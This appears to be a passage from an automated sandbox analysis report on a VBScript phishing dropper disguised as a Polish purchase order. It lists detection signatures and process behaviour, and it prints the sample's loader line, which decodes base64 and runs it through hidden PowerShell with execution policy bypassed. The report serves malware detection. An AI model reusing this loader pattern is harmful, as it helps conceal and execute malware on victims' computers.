jysnuccrj3jvy2unkydzczmyngrofficiosidadeccrjyankyc0ze0nkyc0jysnze0nkycsngrnjysnngqnkydnkscpic1yrvbmyunlicdiwlqnlftdsgfsxtm2icatckvqtgfdzsanngrnjyxbq0hhul0zncaty3jfuexhq2ugj3rwyscsw0niyvjdmzkpfcauicggjhbzsg9nrvsymv0rjhbzae9nrvsznf0rj1gnkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1522478 Sample: Nowe zam#U00f3wienie Roltop.vbs Startdate: 30/09/2024 Architecture: WINDOWS Score: 92 17 Malicious sample detected (through community Yara rule) 2->17 19 Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet 2->19 21 Sigma detected: WScript or CScript Dropper 2->21 23 Sigma detected: Base64 Encoded PowerShell Command Detected 2->23 7 wscript.exe 1 2->7         started        process3 signatures4 25 VBScript performs obfuscated calls to suspicious functions 7->25 27 Suspicious powershell command line found 7->27 29 Wscript starts Powershell (via cmd or directly) 7->29 31 3 other signatures 7->31 10 powershell.exe 7 7->10         started        process5 signatures6 33 Suspicious powershell command line found 10->33 35 Found suspicious powershell code related to unpacking or dynamic code loading 10->35 13 powershell.exe 6 10->13         started        15 conhost.exe 10->15         started        process7
No contacted IP infos